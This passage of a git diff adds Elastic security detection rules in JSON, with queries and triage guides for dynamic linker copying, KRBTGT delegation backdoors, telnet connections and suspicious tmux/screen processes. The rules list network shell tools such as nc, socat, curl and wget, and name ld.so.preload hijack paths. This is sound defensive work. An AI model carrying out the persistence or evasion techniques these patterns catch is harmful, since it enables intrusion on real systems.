"https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 7 + }, + "id": "df0fd41e-5590-4965-ad5e-cd079ec22fa9_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_108.json b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_108.json new file mode 100644 index 00000000000..2021e151bf2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_108.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Dynamic Linker Copy", + "note": "## Triage and analysis\n\n### Investigating Dynamic Linker Copy\n\nThe Linux dynamic linker is responsible for loading shared libraries required by executables at runtime. It is a critical component of the Linux operating system and should not be tampered with. \n\nAdversaries may attempt to copy the dynamic linker binary and create a backup copy before patching it to inject and preload malicious shared object files. This technique has been observed in recent Linux malware attacks and is considered highly suspicious or malicious.\n\nThe detection rule 'Dynamic Linker Copy' is designed to identify such abuse by monitoring for processes with names \"cp\" or \"rsync\" that involve copying the dynamic linker binary (\"/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\") and modifying the \"/etc/ld.so.preload\" file. Additionally, the rule checks for the creation of new files with the \"so\" extension on Linux systems. By detecting these activities within a short time span (1 minute), the rule aims to alert security analysts to potential malicious behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n### Possible investigation steps\n\n- Investigate the dynamic linker that was copied or altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\n path = '/etc/ld.so.preload' OR\\n path = '/lib64/ld-linux-x86-64.so.2' OR\\n path = '/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' OR\\n path = '/usr/lib64/ld-linux-x86-64.so.2' OR\\n path = '/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\n path = '/etc/ld.so.preload' OR\\n path = '/lib64/ld-linux-x86-64.so.2' OR\\n path = '/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' OR\\n path = '/usr/lib64/ld-linux-x86-64.so.2' OR\\n path = '/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n- The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Modification of Dynamic Linker Preload Shared Object Inside A Container - 342f834b-21a6-41bf-878c-87d116eba3ee\n- Modification of Dynamic Linker Preload Shared Object - 717f82c2-7741-4f9b-85b8-d06aeb853f4f\n- Shared Object Created or Changed by Previously Unknown Process - aebaa51f-2a91-4f6a-850b-b601db2293f4\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id with maxspan=1m\n[process where host.os.type == \"linux\" and event.type == \"start\" and process.name in (\"cp\", \"rsync\") and\n process.args in (\n \"/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\", \"/etc/ld.so.preload\", \"/lib64/ld-linux-x86-64.so.2\",\n \"/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\", \"/usr/lib64/ld-linux-x86-64.so.2\"\n )]\n[file where host.os.type == \"linux\" and event.action == \"creation\" and file.extension == \"so\"]\n", + "references": [ + "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "df6f62d9-caab-4b88-affa-044f4395a1e0", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Threat: Orbit", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": "df6f62d9-caab-4b88-affa-044f4395a1e0_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_107.json b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_107.json new file mode 100644 index 00000000000..7072a15d9f7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e052c845-48d0-4f46-8a13-7d0aba05df82_107.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the modification of the msDS-AllowedToDelegateTo attribute to KRBTGT. Attackers can use this technique to maintain persistence to the domain by having the ability to request tickets for the KRBTGT service.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "KRBTGT Delegation Backdoor", + "query": "event.action:modified-user-account and event.code:4738 and\n winlog.event_data.AllowedToDelegateTo:*krbtgt*\n", + "references": [ + "https://skyblue.team/posts/delegate-krbtgt", + "https://github.com/atc-project/atomic-threat-coverage/blob/master/Atomic_Threat_Coverage/Logging_Policies/LP_0026_windows_audit_user_account_management.md" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AllowedToDelegateTo", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "e052c845-48d0-4f46-8a13-7d0aba05df82", + "setup": "## Setup\n\nThe 'Audit User Account Management' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nAccount Management >\nAudit User Account Management (Success,Failure)\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 107 + }, + "id": "e052c845-48d0-4f46-8a13-7d0aba05df82_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_3.json b/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_3.json new file mode 100644 index 00000000000..9e12a3aa287 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_3.json @@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of suspicious commands via screen and tmux. When launching a command and detaching directly, the commands will be executed in the background via its parent process. Attackers may leverage screen or tmux to execute commands while attempting to evade detection.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potentially Suspicious Process Started via tmux or screen", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and \nprocess.parent.name in (\"screen\", \"tmux\") and process.name : (\n \"nmap\", \"nc\", \"ncat\", \"netcat\", \"socat\", \"nc.openbsd\", \"ngrok\", \"ping\", \"java\", \"python*\", \"php*\", \"perl\", \"ruby\",\n \"lua*\", \"openssl\", \"telnet\", \"awk\", \"wget\", \"curl\", \"id\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e0cc3807-e108-483c-bf66-5a4fbe0d7e89", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "e0cc3807-e108-483c-bf66-5a4fbe0d7e89_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_4.json b/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_4.json new file mode 100644 index 00000000000..bd6413aad90 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e0cc3807-e108-483c-bf66-5a4fbe0d7e89_4.json @@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the execution of suspicious commands via screen and tmux. When launching a command and detaching directly, the commands will be executed in the background via its parent process. Attackers may leverage screen or tmux to execute commands while attempting to evade detection.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potentially Suspicious Process Started via tmux or screen", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and \nprocess.parent.name in (\"screen\", \"tmux\") and process.name : (\n \"nmap\", \"nc\", \"ncat\", \"netcat\", \"socat\", \"nc.openbsd\", \"ngrok\", \"ping\", \"java\", \"python*\", \"php*\", \"perl\", \"ruby\",\n \"lua*\", \"openssl\", \"telnet\", \"awk\", \"wget\", \"curl\", \"id\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e0cc3807-e108-483c-bf66-5a4fbe0d7e89", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "e0cc3807-e108-483c-bf66-5a4fbe0d7e89_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_206.json b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_206.json new file mode 100644 index 00000000000..fe3ff14c03b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e12c0318-99b1-44f2-830c-3a38a43207ca_206.json @@ -0,0 +1,84 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies when an AWS Route Table has been created.", + "false_positives": [ + "Route Tables may be created by a system or network administrators. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Route Table creation by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. Automated processes that use Terraform may lead to false positives." + ], + "from": "now-60m", + "index": [ + "filebeat-*", + "logs-aws*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS Route Table Created", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:(CreateRoute or CreateRouteTable) and\nevent.outcome:success\n", + "references": [ + "https://docs.datadoghq.com/security_platform/default_rules/aws-ec2-route-table-modified/", + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_CreateRoute.html", + "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_CreateRouteTable" + ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e12c0318-99b1-44f2-830c-3a38a43207ca", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Use Case: Network Security Monitoring", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "e12c0318-99b1-44f2-830c-3a38a43207ca_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_107.json b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_107.json new file mode 100644 index 00000000000..153165f5fce --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e19e64ee-130e-4c07-961f-8a339f0b8362_107.json @@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to publicly routable IP addresses.", + "false_positives": [ + "Telnet can be used for both benign or malicious purposes. Telnet is included by default in some Linux distributions, so its presence is not inherently suspicious. The use of Telnet to manage devices remotely has declined in recent years in favor of more secure protocols such as SSH. Telnet usage by non-automated tools or frameworks may be suspicious." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Connection to External Network via Telnet", + "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and process.name == \"telnet\" and event.type == \"start\"]\n [network where host.os.type == \"linux\" and process.name == \"telnet\" and not cidrmatch(\n destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\",\n \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\",\n \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\",\n \"192.175.48.0/24\", \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\",\n \"FF00::/8\"\n )\n ]\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e19e64ee-130e-4c07-961f-8a339f0b8362", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "e19e64ee-130e-4c07-961f-8a339f0b8362_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e1db8899-97c1-4851-8993-3a3265353601_3.json b/packages/security_detection_engine/kibana/security_rule/e1db8899-97c1-4851-8993-3a3265353601_3.json new file mode 100644 index 00000000000..9507f240745 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e1db8899-97c1-4851-8993-3a3265353601_3.json @@ -0,0 +1,64 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels.", + "from": "now-6h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "ded_high_sent_bytes_destination_geo_country_iso_code", + "name": "Potential Data Exfiltration Activity to an Unusual ISO Code", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/ded", + "https://www.elastic.co/blog/detect-data-exfiltration-activity-with-kibanas-new-integration" + ], + "related_integrations": [ + { + "package": "ded", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "risk_score": 21, + "rule_id": "e1db8899-97c1-4851-8993-3a3265353601", + "setup": "## Setup\n\nThe rule requires the Data Exfiltration Detection integration assets to be installed, as well as network and file events collected by integrations such as Elastic Defend and Network Packet Capture (for network events only). \n\n### Data Exfiltration Detection Setup\nThe Data Exfiltration Detection integration detects data exfiltration activity by identifying abnormalities in network and file events. Anomalies are detected using Elastic's Anomaly Detection feature. \n\n#### Prerequisite Requirements:\n- Fleet is required for Data Exfiltration Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- Network events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) or [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n\n#### The following steps should be executed to install assets associated with the Data Exfiltration Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Data Exfiltration Detection and select the integration to see more details about it.\n- Under Settings, click Install Data Exfiltration Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Data Exfiltration Detection, you'll need to enable the corresponding Anomaly Detection jobs. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your network data. For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events, or `logs-network_traffic.*` if you used Network Packet Capture.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/ded/kibana/ml_module/ded-ml.json) configuration file, you will see a card for Data Exfiltration Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Data Exfiltration Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": 